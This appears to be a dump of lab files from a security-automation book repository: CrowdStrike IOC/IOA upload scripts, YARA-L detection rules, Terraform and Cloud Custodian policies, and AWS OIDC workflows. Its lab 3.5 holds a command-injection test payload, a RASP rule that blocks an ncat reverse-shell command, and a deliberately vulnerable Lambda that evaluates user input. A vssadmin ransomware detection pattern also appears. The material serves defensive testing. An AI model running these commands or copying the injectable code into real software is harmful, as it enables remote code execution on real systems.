        The raw API response returned by the Falcon command call.
    """
    falcon_client = APIHarnessV2(client_id=id, client_secret=secret)
    # retrodetects=False: do not scan historical telemetry for matches;
    # ignore_warnings=True: proceed even if the platform flags the IOC.
    return falcon_client.command(
        "indicator_create_v1",
        retrodetects=False,
        ignore_warnings=True,
        body=ioc_body,
    )

if __name__ == '__main__':
    arg_parser = argparse.ArgumentParser(
        prog='custom-ioc-crowdstrike',
        description='Takes JSON formatted payload for a custom IOC',
        epilog='Usage: python3 custom-ioc-crowdstrike.py -id "" -secret ""'
    )
    arg_parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
    arg_parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
    cli_args = arg_parser.parse_args()

    # Example SHA256 indicator body; in a real pipeline this would be read
    # from a folder or file in the CI runner and submitted in a loop.
    ioc_payload = {
        "comment": "this is a test if falconpy sdk",
        "indicators": [
            {
                "action": "detect",
                "applied_globally": True,
                "description": "testing custom iocs in sdk",
                "expiration": "2024-10-22T10:40:39.372Z",
                "platforms": ['windows', 'linux'],
                "severity": "low",
                "tags": ['falconpytest', 'test-cti'],
                "type": "sha256",
                "value": "8b8cdeb0540ebe562747fd7c618ed07eb1fbc5e98ed3b372672e045bae203925"
            }
        ]
    }

    # Invoke the upload and echo the raw API response.
    print(uploadioc(ioc_payload, cli_args.id, cli_args.secret))

    exit()
--------------------------------------------------------------------------------
/chapter-02/lab-2.4/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | crowdstrike-falconpy==1.3.5
4 | idna==3.6
5 | requests==2.31.0
6 | urllib3==2.1.0
7 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.5/ag_ioc_sha256_hash_vt_basic.yar.yml:
--------------------------------------------------------------------------------
1 | rule ag_ioc_sha256_hash_vt_basic {
2 | 
3 | meta:
4 | author = "Google Cloud Security"
5 | description = "Used for the Alert Graph Workshop. Detect file/process events with watchlisted hashes from MISP that VT flagged as MS Office docx file types"
6 | type = "alert"
7 | tags = "threat indicators, vt enrichment"
8 | assumption = "Assumes MISP data has been ingested into entity graph; this rule can be modified to utilize other TI indicators"
9 | data_source = "microsoft sysmon"
10 | severity = "Medium"
11 | priority = "Medium"
12 | 
13 | events:
14 | $process.metadata.event_type = "PROCESS_LAUNCH" or $process.metadata.event_type ="FILE_CREATION" // match either process launches or file creations
15 | $process.principal.hostname = $hostname // bind host for the match window below
16 | $process.target.process.file.sha256 != "" // drop events with an empty hash before joining
17 | $process.target.process.file.sha256 = $sha256 // bind hash for the join against $ioc
18 | 
19 | // Enriched field from VirusTotal integration, can be commented out or modified if not using
20 | $process.target.process.file.file_type = "FILE_TYPE_DOCX"
21 | 
22 | // Correlates with MISP data; can be modified based on your MISP parser or other TI
23 | $ioc.graph.metadata.product_name = "MISP"
24 | $ioc.graph.metadata.entity_type = "FILE"
25 | $ioc.graph.metadata.source_type = "ENTITY_CONTEXT"
26 | $ioc.graph.entity.file.sha256 = $sha256 // join: event hash must equal a watchlisted MISP hash
27 | 
28 | match:
29 | $hostname over 30m // group correlated events per host within a 30-minute window
30 | 
31 | outcome:
32 | $risk_score = max(65) // constant risk score of 65 for every match
33 | $event_count = count_distinct($process.metadata.id) // number of distinct telemetry events in the match
34 | 
35 | condition:
36 | $process and $ioc // require both a telemetry event and a matching MISP entity
37 | }
38 | 
--------------------------------------------------------------------------------
/chapter-02/lab-2.5/rule_multiple_connections_ru_cti.yar.yml:
--------------------------------------------------------------------------------
// YARA-L 2.0 detection rule for Google Chronicle.
// Flags hosts making repeated HTTP connections to Russia-geolocated targets
// whose hostnames appear in MISP threat-intel entity-graph data.
rule rule_multiple_connections_ru_cti {
  meta:
    author = "foo"
    description = "bar"
    severity = "Medium"

  events:
    //Implied logical AND between lines back to object "e"
    $e.metadata.event_type = "NETWORK_HTTP"
    // Destination geolocated to Russia (relies on Chronicle IP-geo enrichment).
    $e.target.ip_geo_artifact.location.country_or_region = "Russia"
    $e.target.hostname = $hostname
    //match against known MISP threat intel sources for domains
    $ioc.graph.metadata.product_name = "MISP"
    $ioc.graph.metadata.entity_type = "DOMAIN_NAME"
    $ioc.graph.metadata.source_type = "ENTITY_CONTEXT"
    //setup the variable to correlate the target.hostname event
    $ioc.graph.entity.hostname = $hostname

  match:
    // Group correlated events per hostname over a 15 minute window.
    $hostname over 15m

  outcome:
    $risk_score = 10
    $event_count = count_distinct($hostname)

  condition:
    // Require an IOC match plus at least 2 distinct correlated events.
    ($ioc and $e) and $event_count >=2
}
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
def uploadioa(ioc_body):
    """Create a custom IOA rule in CrowdStrike Falcon.

    Args:
        ioc_body: dict payload matching the Falcon "create_rule" body schema.

    Returns:
        The raw API response dict from the module-level ``falcon`` client.
    """
    # NOTE: relies on the module-level `falcon` APIHarnessV2 client that is
    # constructed once in the __main__ section (avoids re-authenticating and
    # burning API call quota on every upload).
    return falcon.command(
        "create_rule",
        retrodetects=False,
        ignore_warnings=True,
        body=ioc_body,
    )
17 |
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        prog='custom-ioa-cs',
        description='Takes JSON formatted payload for a custom IOA',
        epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
    )
    # required=True makes argparse fail fast with a usage message instead of
    # silently passing None credentials into the API client.
    parser.add_argument('-id', type=str, required=True, help='Crowdstrike Falcon API CLIENT_ID')
    parser.add_argument('-secret', type=str, required=True, help='Crowdstrike Falcon API CLIENT_SECRET')
    args = parser.parse_args()

    #assign secrets from env variables or arguments from CLI
    CLIENT_ID = args.id
    CLIENT_SECRET = args.secret

    #client setup do outside of function so you arent using against call quotas each post
    falcon = APIHarnessV2(client_id=CLIENT_ID,
                          client_secret=CLIENT_SECRET
                          )

    #construct body read from external file like a real CI
    # Use a context manager so the file handle is always closed (the original
    # leaked it), and json.load to parse the stream directly.
    with open('test-rule-import.json', 'r') as file_handle:
        BODY = json.load(file_handle)

    #call function with parameters
    response = uploadioa(BODY)
    json_response = json.dumps(response)
    print(json_response)

    # Explicit success exit; raise SystemExit avoids relying on the
    # interactive-only builtin exit().
    raise SystemExit(0)
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/get-ioa-cs.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Fetch custom IOA rule(s) from the CrowdStrike Falcon API and print them as JSON."""
import os, json
from falconpy import APIHarnessV2

# Do not hardcode API credentials! Pull them from the environment.
CLIENT_ID = os.getenv('CS_CLIENT_ID')
CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')

# Fail fast with a clear message instead of an opaque auth error later.
if not CLIENT_ID or not CLIENT_SECRET:
    raise SystemExit("Set the CS_CLIENT_ID and CS_CLIENT_SECRET environment variables")

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

# IDs of the IOA rules to fetch; "1" is a placeholder for the lab.
BODY = {
    "ids": ["1"]
}

response = falcon.command("get_rules_get", body=BODY)
#print(type(response))
json_response = json.dumps(response)
print(json_response)
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | crowdstrike-falconpy==1.3.5
4 | idna==3.6
5 | requests==2.31.0
6 | urllib3==2.1.0
7 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 SCIS Security
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/README.md:
--------------------------------------------------------------------------------
1 | # terraform-cloudflare-waf-demo
2 | A demo repo of utilizing the Github VCS with terraform cloud as the runner.
3 |
4 | track change test
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/main.tf:
--------------------------------------------------------------------------------
terraform {
  required_providers {
    cloudflare = {
      source  = "cloudflare/cloudflare"
      version = "4.20.0"
    }
  }
}


# Define null variables that are injected by terraform cloud
variable "CLOUDFLARE_API_TOKEN" {
  type      = string
  # Mark the API token sensitive so it is redacted from plan/apply output.
  sensitive = true
}
variable "CLOUDFLARE_EMAIL" {
  type = string
}
variable "CLOUDFLARE_ZONE_ID" {
  type = string
}


provider "cloudflare" {
  # Pull from tf cloud workspace level variables set to environment #
  #api_tokens are used but provider still expects api_key as of 2023-dec-22 commenting out for now
  #api_token = var.CLOUDFLARE_API_TOKEN
  #email     = var.CLOUDFLARE_EMAIL

}

#New rule
#Syntax details https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs/resources/ruleset
resource "cloudflare_ruleset" "terraform_managed_resource_a93d3538be3d47c18220ae2d995a8a4b" {
  kind  = "zone"
  name  = "example test rule from dashboard"
  phase = "http_request_firewall_custom"
  # Interpolation-only expressions ("${var.X}") are deprecated since
  # Terraform 0.12; reference the variable directly.
  zone_id = var.CLOUDFLARE_ZONE_ID
  rules {
    action      = "managed_challenge"
    description = "test"
    enabled     = false
    expression  = "(http.request.method eq \"PATCH\" and http.referer eq \"google.com\")"
  }
}
/*
#additional rule
resource "cloudflare_ruleset" "zone_custom_firewall" {
  zone_id     = var.CLOUDFLARE_ZONE_ID
  name        = "prevent non web traffic on alt ports"
  description = "terraform update 1"
  kind        = "zone"
  phase       = "http_request_firewall_custom"

  rules {
    action      = "managed_challenge"
    expression  = "(not cf.edge.server_port in {80 443})"
    description = "Block ports other than 80 and 443"
    enabled     = false
  }
}
*/
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/wiz-threat-rule-example.tf:
--------------------------------------------------------------------------------
# Example Wiz cloud threat-detection rule (TDR) managed through Terraform.
# Requires the Wiz provider from the private tf.app.wiz.io registry.
terraform {
  required_providers {
    wiz = {
      source  = "tf.app.wiz.io/wizsec/wiz"
      version = "~> 1.3"
    }
  }
}

# Custom TDR triggered by GuardDuty SSH brute-force findings.
resource "wiz_threat_detection_rule" "test" {
  name        = "dennis-test_tdr"
  description = "This is a test TDR"
  severity    = "LOW"
  # Cloud event name(s) this rule evaluates.
  target_event_names = ["GuardDuty: UnauthorizedAccess:EC2/SSHBruteForce"]
  # NOTE(review): wsct-id-* appear to be Wiz security sub-category IDs --
  # confirm they are valid for your tenant.
  security_sub_categories = ["wsct-id-9468", "wsct-id-9469"]
  # OPA (Rego) matcher applied to the raw event; only matches when the
  # GuardDuty finding is not archived.
  opa_matcher = "match { input.RawEventName == 'UnauthorizedAccess:EC2/SSHBruteForce'; input.RawJson.Service.Archived == false }"
  cloud_providers = ["AWS"]
  # Keep findings/issues generation off while testing the rule.
  generate_findings = false
  generate_issues   = false
}
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/aws-iam-cloud-custodian-deploy-lambda-policy.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "VisualEditor0",
6 | "Effect": "Allow",
7 | "Action": [
8 | "lambda:CreateFunction",
9 | "lambda:TagResource",
10 | "cloudwatch:PutMetricData",
11 | "events:PutRule",
12 | "lambda:GetFunctionConfiguration",
13 | "lambda:CreateEventSourceMapping",
14 | "lambda:UntagResource",
15 | "lambda:PutFunctionConcurrency",
16 | "iam:PassRole",
17 | "logs:CreateLogStream",
18 | "ec2:DescribeNetworkInterfaces",
19 | "lambda:DeleteFunction",
20 | "events:ListTargetsByRule",
21 | "events:DescribeRule",
22 | "lambda:UpdateEventSourceMapping",
23 | "lambda:InvokeFunction",
24 | "lambda:GetFunction",
25 | "lambda:UpdateFunctionConfiguration",
26 | "ec2:DeleteNetworkInterface",
27 | "lambda:GetFunctionUrlConfig",
28 | "logs:CreateLogGroup",
29 | "logs:PutLogEvents",
30 | "lambda:GetFunctionCodeSigningConfig",
31 | "lambda:UpdateAlias",
32 | "ec2:CreateNetworkInterface",
33 | "lambda:UpdateFunctionCode",
34 | "events:PutTargets",
35 | "lambda:AddPermission",
36 | "lambda:GetFunctionConcurrency",
37 | "lambda:GetFunctionEventInvokeConfig",
38 | "lambda:DeleteAlias",
39 | "lambda:DeleteFunctionConcurrency",
40 | "lambda:DeleteEventSourceMapping",
41 | "lambda:RemovePermission",
42 | "lambda:CreateAlias"
43 | ],
44 | "Resource": "*"
45 | }
46 | ]
47 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/aws-iam-cloud-custodian-s3-lambdas-policy.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "Stmt1703559105132",
6 | "Action": [
7 | "s3:DeleteBucketPolicy",
8 | "s3:GetBucketAcl",
9 | "s3:GetBucketPolicy",
10 | "s3:GetBucketPolicyStatus",
11 | "s3:GetBucketPublicAccessBlock",
12 | "s3:GetDataAccess",
13 | "s3:GetEncryptionConfiguration",
14 | "s3:GetObject",
15 | "s3:GetObjectAcl",
16 | "s3:ListAccessGrants",
17 | "s3:ListAccessGrantsInstances",
18 | "s3:ListAccessGrantsLocations",
19 | "s3:ListAllMyBuckets",
20 | "s3:ListBucket",
21 | "s3:PutAccessGrantsInstanceResourcePolicy",
22 | "s3:PutAccessPointPolicy",
23 | "s3:PutAccessPointPublicAccessBlock",
24 | "s3:PutAccountPublicAccessBlock",
25 | "s3:PutBucketAcl",
26 | "s3:PutBucketPolicy"
27 | ],
28 | "Effect": "Allow",
29 | "Resource": "*"
30 | }
31 | ]
32 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/cfn-configure-aws-credentials-latest.yml:
--------------------------------------------------------------------------------
# CloudFormation template: IAM role assumable by GitHub Actions via OIDC,
# based on the aws-actions/configure-aws-credentials sample template.
Parameters:
  GitHubOrg:
    Description: Name of GitHub organization/user (case sensitive)
    Type: String
  RepositoryName:
    Description: Name of GitHub repository (case sensitive)
    Type: String
  OIDCProviderArn:
    Description: Arn for the GitHub OIDC Provider. (optional)
    Default: ""
    Type: String
  OIDCAudience:
    Description: Audience supplied to configure-aws-credentials.
    Default: "sts.amazonaws.com"
    Type: String

Conditions:
  # Create a new OIDC provider only when no existing provider ARN was supplied.
  CreateOIDCProvider: !Equals
    - !Ref OIDCProviderArn
    - ""

Resources:
  Role:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Statement:
          - Effect: Allow
            Action: sts:AssumeRoleWithWebIdentity
            Principal:
              # Trust either the provider created below or the one passed in.
              Federated: !If
                - CreateOIDCProvider
                - !Ref GithubOidc
                - !Ref OIDCProviderArn
            Condition:
              StringEquals:
                # Restrict tokens to the expected audience.
                token.actions.githubusercontent.com:aud: !Ref OIDCAudience
              StringLike:
                # Restrict to workflows from this org/repo (any branch/ref).
                token.actions.githubusercontent.com:sub: !Sub repo:${GitHubOrg}/${RepositoryName}:*

  GithubOidc:
    Type: AWS::IAM::OIDCProvider
    Condition: CreateOIDCProvider
    Properties:
      Url: https://token.actions.githubusercontent.com
      ClientIdList:
        - sts.amazonaws.com
      ThumbprintList:
        # NOTE(review): placeholder thumbprint -- AWS now validates GitHub's
        # OIDC certificate chain itself; confirm this is acceptable for your
        # partition before deploying.
        - ffffffffffffffffffffffffffffffffffffffff

Outputs:
  Role:
    Value: !GetAtt Role.Arn
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/custodian-s3-policy.yml:
--------------------------------------------------------------------------------
### S3 Related ###
# Cloud Custodian policies that continuously remediate S3 misconfigurations.
# NOTE(review): the role ARNs below omit the AWS account ID
# (arn:aws:iam::<ACCOUNT_ID>:role/...) -- fill these in before deploying.
policies:
  - name: s3-bucket-encryption-policy-absent
    resource: s3
    mode:
      # Deploy as a Lambda that runs on a 1-hour schedule.
      type: periodic
      schedule: "rate(1 hour)"
      role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
    execution-options:
      # Role assumed by the Lambda at execution time.
      assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
      metrics: aws
    description: s3 buckets without encryption required and re-enable encryption
    filters:
      - type: no-encryption-statement
    actions:
      # Re-enable default AES256 server-side encryption on the bucket.
      - type: set-bucket-encryption
        crypto: AES256
        enabled: True
      # Tag the bucket so remediations are auditable.
      - type: tag
        tag: secops
        value: remediated
  - name: s3-bucket-public-block-absent
    resource: s3
    mode:
      type: periodic
      schedule: "rate(1 hour)"
      role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
    execution-options:
      assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
      metrics: aws
    description: s3 buckets without public access blocked are re-enabled
    filters:
      # Match buckets missing these public-access-block settings.
      - type: check-public-block
        BlockPublicAcls: true
        BlockPublicPolicy: true
    actions:
      # Re-apply the public-access block.
      - type: set-public-block
        BlockPublicAcls: true
        BlockPublicPolicy: true
      - type: tag
        tag: secops
        value: remediated
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/deploy-to-aws-cloud-custodian.yml:
--------------------------------------------------------------------------------
# Ref: https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/
# Ref2: https://github.com/aws-actions/configure-aws-credentials
# Ref3: https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services

# Use OIDC connection to AWS account and assume role
name: Connect to an AWS role from a GitHub repository

# Controls when the action will run. Invokes the workflow on push events but only for the main branch
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

env:
  AWS_REGION: "us-east-2" # Change to reflect your Region

# Permission can be added at job level or workflow level
permissions:
  id-token: write # This is required for requesting the JWT
  contents: read  # This is required for actions/checkout
jobs:
  InstallPythonAssumeIAMRole:
    runs-on: ubuntu-latest
    steps:
      - name: Git clone the repository
        uses: actions/checkout@v4
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam:::role/GithubOIDC-Actions-Role- # change to reflect your IAM role's ARN
          role-session-name: GitHub_to_AWS_via_FederatedOIDC
          aws-region: ${{ env.AWS_REGION }}
      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.10'
      - name: Install Cloud Custodian
        run: pip install c7n
      # FIX: the original gave one step two `run:` keys -- a duplicate mapping
      # key is invalid YAML and the first command would be silently dropped.
      # Validate and deploy are now separate, named steps.
      - name: Validate Cloud Custodian Policy
        run: custodian validate ./sample-policy.yml
      - name: Deploy Cloud Custodian Policy
        run: custodian run --region us-east-2 --verbose ./sample-policy.yml -s ./out-log/
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/oidc-trust-aws.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2008-10-17",
3 | "Statement": [
4 | {
5 | "Effect": "Allow",
6 | "Principal": {
7 | "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com"
8 | },
9 | "Action": "sts:AssumeRoleWithWebIdentity",
10 | "Condition": {
11 | "StringEquals": {
12 | "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
13 | },
14 | "StringLike": {
15 | "token.actions.githubusercontent.com:sub": "repo:/:*"
16 | }
17 | }
18 | }
19 | ]
20 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/sample-policy.yml:
--------------------------------------------------------------------------------
1 | ### S3 Related ###
2 | policies:
3 | - name: s3-bucket-encryption-policy-absent
4 | resource: s3
5 | mode:
6 | type: periodic
7 | schedule: "rate(1 hour)"
8 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
9 | execution-options:
10 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
11 | metrics: aws
12 | description: s3 buckets without encryption required and re-enable encryption
13 | filters:
14 | - type: no-encryption-statement
15 | actions:
16 | - type: set-bucket-encryption
17 | crypto: AES256
18 | enabled: True
19 | - type: tag
20 | tag: secops
21 | value: remediated
22 | - name: s3-bucket-public-block-absent
23 | resource: s3
24 | mode:
25 | type: periodic
26 | schedule: "rate(1 hour)"
27 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
28 | execution-options:
29 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
30 | metrics: aws
31 | description: s3 buckets without public access blocked are re-enabled
32 | filters:
33 | - type: check-public-block
34 | BlockPublicAcls: true
35 | BlockPublicPolicy: true
36 | actions:
37 | - type: set-public-block
38 | BlockPublicAcls: true
39 | BlockPublicPolicy: true
40 | - type: tag
41 | tag: secops
42 | value: remediated
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/aws-lambda-sample-rce-payload.json:
--------------------------------------------------------------------------------
1 | {
2 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
3 | "resource": "/{proxy+}",
4 | "path": "/path/to/resource",
5 | "httpMethod": "POST",
6 | "isBase64Encoded": true,
7 | "queryStringParameters": {
8 | "calc": "exec('import subprocess') or subprocess.run(['ls', '-l'], capture_output=True)"
9 | },
10 | "multiValueQueryStringParameters": {
11 | "foo": [
12 | "bar"
13 | ]
14 | },
15 | "pathParameters": {
16 | "proxy": "/path/to/resource"
17 | },
18 | "stageVariables": {
19 | "baz": "qux"
20 | },
21 | "headers": {
22 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
23 | "Accept-Encoding": "gzip, deflate, sdch",
24 | "Accept-Language": "en-US,en;q=0.8",
25 | "Cache-Control": "max-age=0",
26 | "CloudFront-Forwarded-Proto": "https",
27 | "CloudFront-Is-Desktop-Viewer": "true",
28 | "CloudFront-Is-Mobile-Viewer": "false",
29 | "CloudFront-Is-SmartTV-Viewer": "false",
30 | "CloudFront-Is-Tablet-Viewer": "false",
31 | "CloudFront-Viewer-Country": "US",
32 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
33 | "Upgrade-Insecure-Requests": "1",
34 | "User-Agent": "Custom User Agent String",
35 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
36 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
37 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
38 | "X-Forwarded-Port": "443",
39 | "X-Forwarded-Proto": "https"
40 | },
41 | "multiValueHeaders": {
42 | "Accept": [
43 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
44 | ],
45 | "Accept-Encoding": [
46 | "gzip, deflate, sdch"
47 | ],
48 | "Accept-Language": [
49 | "en-US,en;q=0.8"
50 | ],
51 | "Cache-Control": [
52 | "max-age=0"
53 | ],
54 | "CloudFront-Forwarded-Proto": [
55 | "https"
56 | ],
57 | "CloudFront-Is-Desktop-Viewer": [
58 | "true"
59 | ],
60 | "CloudFront-Is-Mobile-Viewer": [
61 | "false"
62 | ],
63 | "CloudFront-Is-SmartTV-Viewer": [
64 | "false"
65 | ],
66 | "CloudFront-Is-Tablet-Viewer": [
67 | "false"
68 | ],
69 | "CloudFront-Viewer-Country": [
70 | "US"
71 | ],
72 | "Host": [
73 | "0123456789.execute-api.us-east-1.amazonaws.com"
74 | ],
75 | "Upgrade-Insecure-Requests": [
76 | "1"
77 | ],
78 | "User-Agent": [
79 | "Custom User Agent String"
80 | ],
81 | "Via": [
82 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
83 | ],
84 | "X-Amz-Cf-Id": [
85 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
86 | ],
87 | "X-Forwarded-For": [
88 | "127.0.0.1, 127.0.0.2"
89 | ],
90 | "X-Forwarded-Port": [
91 | "443"
92 | ],
93 | "X-Forwarded-Proto": [
94 | "https"
95 | ]
96 | },
97 | "requestContext": {
98 | "accountId": "123456789012",
99 | "resourceId": "123456",
100 | "stage": "prod",
101 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
102 | "requestTime": "09/Apr/2015:12:34:56 +0000",
103 | "requestTimeEpoch": 1428582896000,
104 | "identity": {
105 | "cognitoIdentityPoolId": null,
106 | "accountId": null,
107 | "cognitoIdentityId": null,
108 | "caller": null,
109 | "accessKey": null,
110 | "sourceIp": "127.0.0.1",
111 | "cognitoAuthenticationType": null,
112 | "cognitoAuthenticationProvider": null,
113 | "userArn": null,
114 | "userAgent": "Custom User Agent String",
115 | "user": null
116 | },
117 | "path": "/prod/path/to/resource",
118 | "resourcePath": "/{proxy+}",
119 | "httpMethod": "POST",
120 | "apiId": "1234567890",
121 | "protocol": "HTTP/1.1"
122 | }
123 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/example-custom-rasp-rule.json:
--------------------------------------------------------------------------------
1 | {
2 | "exec_control": {
3 | "configuration": {
4 | "rules": [
5 | {
6 | "action": "block",
7 | "command": "ncat --udp 10.10.10.10 53 -e /bin/bash"
8 | }
9 | ]
10 | },
11 | "status": "enabled"
12 | }
13 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/insecure_lamda_example.py:
--------------------------------------------------------------------------------
1 | #some vulnerable function to command injection from an API gateway query parameters
2 | #To extend this test case: persistent payload return PoC runtime replacement: https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/
3 |
4 | #Uncommon modules need layer import
5 | #mkdir python && python3 -m 'venv' ./ && source ./bin/activate && pip install seval -t python && zip seval-layer.zip python
6 | #aws lambda publish-layer-version --layer-name seval-layerr --zip-file fileb://seval-layer.zip --compatible-runtimes python3.9 --region us-east-1
7 |
8 | import trend_app_protect.start
9 | from trend_app_protect.api.aws_lambda import protect_handler
10 | #import seval
@protect_handler
def lambda_handler(event, context):
    """Intentionally vulnerable calculator endpoint used to exercise RASP rules.

    Reads the `calc` query-string parameter from an API Gateway proxy event
    and evaluates it as a Python expression.

    Args:
        event: API Gateway proxy integration event (dict).
        context: Lambda context object (unused).

    Returns:
        str: the evaluated expression result.

    Raises:
        ValueError: if the input is empty.
        AssertionError: if the input contains no math operator characters.
    """
    #pretend we have a valid API with a parameter of calc
    calcexpr = str(event["queryStringParameters"]["calc"])
    print("*****")
    print("This is the input from user: " +calcexpr)
    print("*****")

    #simple pass-listing is not enough sometimes
